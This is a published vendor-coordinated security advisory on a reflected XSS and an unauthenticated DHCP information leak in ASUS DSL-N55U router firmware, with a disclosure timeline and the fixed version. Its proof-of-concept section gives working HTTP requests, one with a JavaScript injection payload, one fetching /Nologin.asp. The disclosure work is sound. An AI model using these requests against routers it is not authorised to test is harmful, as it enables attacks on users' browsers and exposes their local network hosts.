ASUS DSL-N55U 3.0.0.4.376_2736 XSS / Information Disclosure
Posted on 28 June 2016
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 > ======================================================================= title: XSS and information disclosure vulnerability product: ASUS DSL-N55U router vulnerable version: 3.0.0.4.376_2736 fixed version: 3.0.0.4_380_3679 CVE number: requested impact: Medium homepage: https://www.asus.com/ found: 2016-04-12 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "ASUS has long been at the forefront of this growth and while the company started life as a humble motherboard manufacturer with just a handful of employees, it is now the leading technology company in Taiwan with over 12,500 employees worldwide. ASUS makes products in almost every area of Information Technology too, including PC components, peripherals, notebooks, tablets, servers and smartphones." Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS Business recommendation: ------------------------ SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- 1. Reflected Cross-Site Scripting The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware. If the web path is longer than 50 characters, it will redirect a user to the cloud_sync.asp page with the web path as a value of a GET parameter. Due to the lack of input validation, an attacker can insert malicious JavaScript code to be executed under a victim's browser context. No authentication is required. 2. Remote DHCP Information Disclosure An unauthenticated attacker can gain access to DHCP information including the hostname and private IP addresses of the local machines connected to the router from the WAN IP address. Proof of concept: ----------------- 1. Reflected Cross-Site Scripting HTTP Request: GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1 Host: <ASUS router IP> HTTP Response: HTTP/1.0 200 OK Server: httpd Date: Tue, 12 Apr 2016 09:04:48 GMT Content-Type: text/html Connection: close <HTML><HEAD><script>location.href='/cloud_sync.asp?flag=111111111111111111111111111111111111111'+alert('XSS')+'';</script> </HEAD></HTML> 2. Remote DHCP Information Disclosure HTTP Request: GET /Nologin.asp HTTP/1.1 Host: <ASUS router IP> HTTP Response: HTTP/1.0 200 Ok Server: httpd [...] var dhcpLeaseInfo = [['<ip-1>', '<hostname-1>'],['<ip-2>', '<hostname-2>'],['<ip-N>', '<hostname-N>']];; function initial(){ [...] Vulnerable / tested versions: ----------------------------- The following firmware has been tested which was the most recent version at the time of discovery: - 3.0.0.4.376_2736 (2015/01/19 update) URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/ Vendor contact timeline: ------------------------ 2016-06-02: Contacting vendor through privacy@asus.com and netadmin@asus.com.tw. 2016-06-03: ASUS responds and establishes encrypted communication channel. 2016-06-06: Sending PGP encrypted security advisory to ASUS. 2016-06-20: Vulnerability is fixed in beta firmware. 2016-06-24: Public release of the advisory. Solution: --------- Upgrade to firmware version 3.0.0.4_380_3679 or later. Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Pichaya Morimoto / @2016